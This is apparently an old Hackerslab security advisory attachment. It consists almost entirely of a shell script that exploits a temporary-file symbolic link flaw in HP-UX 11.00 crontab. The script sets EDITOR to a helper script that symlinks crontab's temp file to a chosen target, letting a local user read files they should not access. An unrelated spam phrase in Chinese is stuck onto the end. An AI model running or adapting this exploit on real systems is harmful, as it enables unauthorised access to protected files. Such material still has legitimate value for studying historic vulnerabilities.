[ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link vulnerability Attach ====================== crontab.sh ================================ #!/bin/sh # # HP-UX 11.00 crontab # # Kyong-won,Cho # # dubhe@hackerslab.com # # Usage : ./crontab.sh # # if [ -z "$1" ] then echo "Usage : $0 " exit fi cat << _EOF_ > /tmp/crontab_exp #!/bin/sh ln -sf $1 \$1 _EOF_ chmod 755 /tmp/crontab_exp EDITOR=/tmp/crontab_exp export EDITOR crontab -e 2> /tmp/crontab$$ grep -v "error on previous line" /tmp/crontab$$ rm -f /tmp/crontab_exp /tmp/crontab$$ ==================================================end

亚洲欧美在线